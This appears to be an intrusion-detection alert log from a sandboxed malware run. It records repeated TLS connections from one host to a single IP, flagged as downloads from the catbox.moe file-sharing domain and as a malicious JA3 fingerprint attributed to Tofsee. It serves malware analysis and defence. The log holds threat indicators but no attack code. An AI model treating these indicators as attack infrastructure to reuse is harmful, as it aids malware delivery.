TCP 192.168.56.103:49227 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49232 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49232 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49232 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49241 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49241 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49241 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49242 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49242 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49242 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49241 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49251 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49251 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49251 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49253 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49253 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49253 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49256 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49256 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49256 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49260 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49260 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49260 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49261 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49261 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49261 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49262 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49262 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49262 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49266 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49266 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49266 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49271 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49271 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49271 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49277 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49277 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49277 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49282 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49282 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49282 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49285 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49285 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49285 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49287 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49287 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49287 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49293 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49293 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49293 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49305 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49305 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49305 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49309 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49309 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49309 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49310 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49310 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49310 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49312 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49312 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49312 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49314 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49314 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49314 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49329 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49329 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49329 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49333 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49333 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49333 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49339 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49339 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49339 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49344 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49344 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49344 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49344 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49353 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49353 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49353 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49357 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49357 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49357 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49358 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49358 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49358 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49386 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49386 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49386 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49391 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49391 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49391 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49397 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49397 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49397 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49399 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49399 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49399 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49401 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49401 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49401 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49402 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49402 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49402 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49402 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49406 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49406 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49406 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49413 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49413 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49413 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49418 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49418 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49418 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49431 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49431 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49431 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49452 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49452 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49452 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49453 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49453 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49453 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49452 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49478 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49478 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49478 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49479 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49479 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49479 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49484 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49484 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49484 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49486 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49486 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49486 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49490 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49490 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49490 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49349 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49393 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49458 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49464 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49249 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49400 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49342 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49415 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49207 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49460 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49410 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49481 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49244 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49198 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49255 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49213 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49442 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49326 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49469 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49389 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49390 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49451 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49416 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49366 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49238 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49288 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49474 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49437 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49407 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49428 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49338 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49280 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49420 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49441 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49376 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49276 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49205 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49472 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49383 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49378 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49403 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49362 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49505 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49492 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49433 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49496 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49372 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49239 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
